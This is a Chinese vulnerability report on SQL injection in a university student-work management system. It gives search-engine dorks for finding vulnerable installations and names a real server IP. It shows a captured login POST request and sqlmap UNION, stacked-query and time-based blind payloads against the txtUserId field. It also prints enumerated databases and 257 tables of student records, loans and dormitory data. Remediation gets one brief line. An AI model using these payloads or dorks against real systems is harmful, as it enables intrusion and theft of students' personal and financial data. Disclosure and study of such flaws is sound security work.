某高校管理系统存在通用型SQL注入漏洞

西安奥达软件工程有限公司旗下高校学生工作管理系统前台及后台均存在注入漏洞
1、高校学生工作管理系统前台



intitle:学生工作管理系统 Login/List.aspx?ID=



以http://xxx/Login/List.aspx?ID=99为例



sqlmap identified the following injection points with a total of 100 HTTP(s) requests:

---
 

Place: POST

Parameter: txtUserId

Type: UNION query

Title: Generic UNION query (NULL) - 6 columns

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(104)+CHAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58), NULL-- &txtPwd=1&RadioButtonList1=1&Button1=登 录



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&RadioButtonList1=1&Button1=登 录



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&RadioButtonList1=1&Button1=登 录

---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: POST

Parameter: txtUserId

Type: UNION query

Title: Generic UNION query (NULL) - 6 columns

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(104)+CHAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58), NULL-- &txtPwd=1&RadioButtonList1=1&Button1=登 录



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&RadioButtonList1=1&Button1=登 录




Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&RadioButtonList1=1&Button1=登 录

---

current user: 'auda'

current database: 'StudWorkXiDian'

available databases [7]:

[*] master

[*] model

[*] msdb

[*] Northwind

[*] pubs

[*] StudWorkXiDian

[*] tempdb



可跨库

Database: pubs

[14 tables]

+----------------------+

| [dbo/awthors] |

| [dbo/discounts] |

| [dbo/employee] |

| [dbo/jobs] |

| [dbo/pwb_info] |

| [dbo/pwblishers] |

| [dbo/roysched] |

| [dbo/sales] |

| [dbo/stores\t] |

| [dbo/sysconstraints] |

| [dbo/syssegments] |

| [dbo/titleawthor] |

| [dbo/titles\r\t] |

| [dbo/titleview] |

+----------------------+

2、高校学生工作管理系统后台



关键字：inurl:/Login/loginpageforuserb.aspx
 

以http://112.29/Login/loginpageforuserb.aspx为例



用户名处没有过滤（txtUserId），导致注射



burp抓包

POST http://202.117.112.29/Login/loginpageforuserb.aspx HTTP/1.1

Host: 202.117.112.29

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://202.117.112.29/Login/loginpageforuserb.aspx

Cookie: ASP.NET_SessionId=oj5sbgn3ovvansabkijagoaz

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 719



__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHwECCmRkZI%2B9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=%2FwEWBwLo5YDJCAKz8dy8BQKd%2B7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1&txtPwd=1&RadioButtonList1=1&Button1=%E7%99%BB+%E5%BD%95



Place: POST

Parameter: txtUserId

Type: UNION query

Title: Generic UNION query (NULL) - 6 columns

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9

kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpP

lhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leW

PtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU

9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnID

lpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+W

NleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJ

CAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txt

UserId=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(104)+C

HAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(

68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58),



NULL-- &txtPwd=1&RadioButtonList1=1&Button1=? ?



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9

kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpP

lhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leW

PtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU

9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnID

lpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+W

NleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJ

CAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txt

UserId=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&RadioButtonList1=1&Button1=? ?



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9

kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpP

lhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leW

PtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU

9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnID

lpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+W

NleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJ

CAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txt

UserId=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&RadioButtonList1=1&Button1=? ?

---

[15:36:02] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows 2003

web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727

back-end DBMS: Microsoft SQL Server 2000

[15:36:02] [INFO] fetching current user

current user: 'auda'

[15:36:02] [INFO] fetching current database

current database: 'StudWorkXiDian'

[15:36:02] [INFO] fetching database names

[15:36:02] [INFO] the SQL query used returns 7 entries

[15:36:02] [INFO] resumed: "master"

[15:36:02] [INFO] resumed: "model"

[15:36:02] [INFO] resumed: "msdb"

[15:36:02] [INFO] resumed: "Northwind"

[15:36:02] [INFO] resumed: "pubs"

[15:36:02] [INFO] resumed: "StudWorkXiDian"

[15:36:02] [INFO] resumed: "tempdb"

available databases [7]:

[*] master

[*] model

[*] msdb

[*] Northwind

[*] pubs

[*] StudWorkXiDian

[*] tempdb

257张表



Database: StudWorkXiDian

[257 tables]

+-------------------------------+

| dbo.LogTemp |

| dbo.Test |

| dbo.Vstipend_ApplyInfo |

| dbo.Vsubsidy_ApplyInfo |

| dbo.[tsys_Modules_测试] |

| dbo.dtproperties |

| dbo.sysconstraints |

| dbo.syssegments |

| dbo.tAcc_File |

| dbo.tAppoinmentRelation |

| dbo.tAppointment |

| dbo.tAppointmentType |

| dbo.tAppointmentTypeExplain |

| dbo.tArr_Accessories |

| dbo.tArr_ArrType |

| dbo.tArr_Auditing |

| dbo.tArr_requiteType |

| dbo.tCadre_InWork |

| dbo.tCadre_OutWork |

| dbo.tCadre_StudWork |

| dbo.tDorm_Area |

| dbo.tDorm_Bed |

| dbo.tDorm_Building |

| dbo.tDorm_ChargeHistory |

| dbo.tDorm_History |

| dbo.tDorm_RewardHistory |

| dbo.tDorm_Room |

| dbo.tDorm_RoomMaster |

| dbo.tDorm_RoomType |

| dbo.tDrom_BuildingUser |

| dbo.tFile_Video |

| dbo.tGB_GMZ |

| dbo.tGB_HYZK |

| dbo.tGB_JKZK |

| dbo.tGB_SJGGHDQ |

| dbo.tGB_XB |

| dbo.tGB_XW |

| dbo.tGB_XZQH |

| dbo.tGB_ZZMM |

| dbo.tJQRY_Apply |

| dbo.tJQRY_SP |

| dbo.tJQRY_Type |

| dbo.tOther_ArcAgent |

| dbo.tOther_ArcBase |

| dbo.tOther_ArcContent |

| dbo.tOther_ArcItem |

| dbo.tOther_ArcTurnOver |

| dbo.tPoor_Student |

| dbo.tPopedom_Atom |

| dbo.tReg_register |

| dbo.tReplyAppointment |

| dbo.tSchoolLoanLevel |

| dbo.tSchoolLoanProportion |

| dbo.tSchoolLoanRefund |

| dbo.tSchoolLoans |

| dbo.tStudCadre_Info |

| dbo.tStudCadre_Type |

| dbo.tStudCadre_Unit |

| dbo.tStud_AllowApply |

| dbo.tTemp_Apply |



| dbo.tarm_AwardList |

| dbo.tarm_CentType |

| dbo.tarm_StudCourse |

| dbo.tarm_StudLevy |

| dbo.tarm_StudRecord |

| dbo.tarm_policy |

| dbo.tarr_Info |

| dbo.tarr_repay |

| dbo.tasl_Affirm |

| dbo.tasl_Bank |

| dbo.tasl_BankAuditing |

| dbo.tasl_BankBargain |

| dbo.tasl_Breach |

| dbo.tasl_End |

| dbo.tasl_Extend |

| dbo.tasl_Familial |

| dbo.tasl_Imburse |

| dbo.tasl_LoanType |

| dbo.tasl_Postponed |

| dbo.tasl_SchoolAuditing |

| dbo.tasl_SchoolAuditingIdea |

| dbo.tasl_StudRequisition |

| dbo.tasl_Whither |

| dbo.tbase_Department |

| dbo.tbase_Teacher |

| dbo.tbase_User |

| dbo.tcgt_StudCourse2 |

| dbo.tcgt_StudCourse3 |

| dbo.tcgt_StudRecord2 |

| dbo.tcgt_StudRecord3 |

| dbo.tcgt_stdResultCell |

| dbo.tcgt_stdResultCell2 |

| dbo.tcgt_stdResultCell3 |

| dbo.tcgt_stdScale2 |

| dbo.tcgt_stdScale3 |

| dbo.tcmoe_RewardLevel |

| dbo.tcmoe_RewardType |

| dbo.tcmoe_StatusChangeCause |

| dbo.tcmoe_StatusChangeType |

| dbo.tcode_Academic |

| dbo.tcode_BloodType |

| dbo.tcode_CultivateMode |

| dbo.tcode_Educate |

| dbo.tcode_Emigrant |

| dbo.tcode_Job |

| dbo.tcode_LoanState |

| dbo.tcode_Post |

| dbo.tcode_ProSchoolAccount |

| dbo.tcode_PsychologyLevel |

| dbo.tcode_StudType |

| dbo.tcode_TeacherRole |

| dbo.tcode_poorType |

| dbo.tcpt_BranchActivity |

| dbo.tcpt_ClassRelation |

| dbo.tcpt_Document |

| dbo.tcpt_MemberStudy |

| dbo.tcpt_PartyActive |

| dbo.tcpt_PartyBranch |

| dbo.tcpt_PartyMember |

| dbo.tcpt_PartyPrep |

| dbo.tcpt_PersonRelation |

| dbo.tcpt_Requisition |

| dbo.terr_Accessories |

| dbo.terr_Auditing |

| dbo.terr_Auditing2 |

| dbo.terr_ErrCause |

| dbo.terr_ErrInfo |

| dbo.terr_ErrType |

| dbo.terr_PunishType |

| dbo.terr_Remove |

| dbo.titem_PartyBranchType |

| dbo.titem_PartyMemberType |

| dbo.titem_PartySchoolType |

| dbo.tmem_BookEnrol |

| dbo.tmem_ChooseCadre |

| dbo.tmem_Development |

| dbo.tmem_DevelopmentNum |

| dbo.tmem_MemBerDocment |

| dbo.tmem_MemCharge |

| dbo.tmem_Member |

| dbo.tmem_OrgType |

| dbo.tmem_Party |

| dbo.tmem_PartyNum |

| dbo.tmem_Record |

| dbo.tmem_Rewards |

| dbo.tmem_TrainDepartment |

| dbo.tmem_TrainManInfo |

| dbo.tmem_orgMan |

| dbo.tmem_organization |

| dbo.tmema_ActivityApply |

| dbo.tmema_ActivityAudit |

| dbo.tmema_ActivityField |

| dbo.tmema_AssnJob |

| dbo.tmema_AssnMember |

| dbo.tmemp_Activity |

| dbo.tmemp_ComAuthor |

| dbo.tmemp_ComManuscript |

| dbo.tmemp_ComReport |

| dbo.tmemp_PublicationIssue |

| dbo.tmemp_PulicJob |

| dbo.tpopedom_UserBackManage |

| dbo.tpopedom_UserModule |

| dbo.treward_Information |

| dbo.treward_InformationG |

| dbo.treward_TypeG |

| dbo.tsafety_InsurePayforMoney |

| dbo.tsafety_InsureRegStudent |

| dbo.tsafety_SafetyGrade |

| dbo.tsafety_Type |

| dbo.tschol_Annotion |

| dbo.tschol_Apply |

| dbo.tschol_Classify |

| dbo.tschol_Quotas |

| dbo.tschol_RankObj |

| dbo.tssc_History |

| dbo.tstipend_Annotion |

| dbo.tstipend_Apply |

| dbo.tstipend_Apply_Temp |

| dbo.tstipend_Classify |

| dbo.tstipend_Quotas |

| dbo.tstipend_RankObj |

| dbo.tstud_Accessories |

| dbo.tstud_CardPrint |

| dbo.tstud_CardPrintFiled |

| dbo.tstud_Family |

| dbo.tstud_FieldEdit |

| dbo.tstud_Student_BKS |

| dbo.tstud_Student_Temp_BKS |

| dbo.tstud_Student_Temp_YJS |

| dbo.tstud_Student_YJS |

| dbo.tsubsidy_Annotion |

| dbo.tsubsidy_Apply |

| dbo.tsubsidy_Apply_Temp |

| dbo.tsubsidy_Classify |

| dbo.tsubsidy_Quotas |

| dbo.tsubsidy_RankObj |

| dbo.tsys_Download |

| dbo.tsys_FriendlyLink |

| dbo.tsys_Notice |

| dbo.tsys_NoticeType |

| dbo.tsys_Options |

| dbo.tsys_VoteList |

| dbo.tsys_VoteProject |

| dbo.tsys_VoteRen |

| dbo.tsys_loginLog |

| dbo.tsys_loginSession |

| dbo.twork_Apply |

| dbo.twork_Apply_Temp |

| dbo.twork_CheckIn |

| dbo.twork_Department |



| dbo.twork_PayMoney |

| dbo.twork_PostObj |

| dbo.twork_PostType |

| dbo.txm_PYFS |

| dbo.txm_SS |

| dbo.txm_XL |

| dbo.txm_XSLX |

| dbo.txm_XSZT |

| dbo.vAloan_ListAff |

| dbo.vAloan_ListBasic |

| dbo.vAloan_ListExtend |

| dbo.vArr_ApplyInfo_BKS |

| dbo.vArr_ApplyInfo_YJS |

| dbo.vCadreGroup_state |

| dbo.vDorm_AllRoomDetail |

| dbo.vDorm_Bed |

| dbo.vDorm_BuidingCode |

| dbo.vDorm_CanBePreared |

| dbo.vDorm_CanUseBed |

| dbo.vDorm_Preared |

| dbo.vDorm_UsedBed |

| dbo.vDorm_building |

| dbo.vDorm_room |

| dbo.vDorm_student |

| dbo.vSchol_QuotaForDept |

| dbo.vSchoolLoans_BKS |

| dbo.vbase_Department |

| dbo.vcgt_StudSumRecord2 |

| dbo.vcgt_StudSumRecord3 |

| dbo.vcgt_student |

| dbo.vparty_PersonRelation |

| dbo.vparty_StatBranchSum |

| dbo.vpopedom_UserModule |

| dbo.vschol_QuotaForClass |

| dbo.vstipend_Classify |

| dbo.vstipend_QuotaForClass |

| dbo.vstipend_QuotaForDept |

| dbo.vstipend_QuotaForGrade |

| dbo.vstud_Student_BKS |

| dbo.vstud_Student_Temp_BKS |

| dbo.vstud_Student_YJS |

| dbo.vsubsidy_Classify |

| dbo.vsubsidy_QuotaForClass |

| dbo.vsubsidy_QuotaForDept |

| dbo.vsubsidy_QuotaForGrade |

| dbo.vtstud_Student_Temp_YJS |

| dbo.vwork_Department |

+-------------------------------+

  修复方案：

过滤多个参数